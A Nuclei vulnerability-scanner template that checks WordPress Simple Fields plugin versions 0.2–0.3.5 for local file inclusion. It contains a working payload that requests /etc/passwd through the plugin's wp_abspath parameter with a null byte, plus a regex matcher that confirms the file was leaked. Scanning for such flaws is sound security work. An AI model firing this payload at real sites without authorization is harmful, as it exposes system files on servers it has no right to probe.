Files
nuclei-templates/http/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml
2024-12-01 13:57:55 +00:00

24 lines
891 B
YAML

id: wp-simple-fields-lfi
info:
name: WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
author: 0x240x23elu
severity: high
description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution.
reference:
- https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html
metadata:
max-request: 1
tags: wp-plugin,lfi,packetstorm,wordpress
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00"
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
# digest: 4a0a0047304502200fdf5094f2289204706f1ee60e2b13d16a5aebe75822f68dd9765bb1f93ee6ac022100f2e4c586bbe373af220c47061bb528af69c8742717c37aae497850b341fc5307:922c64590222798bb761d5b6d8e72950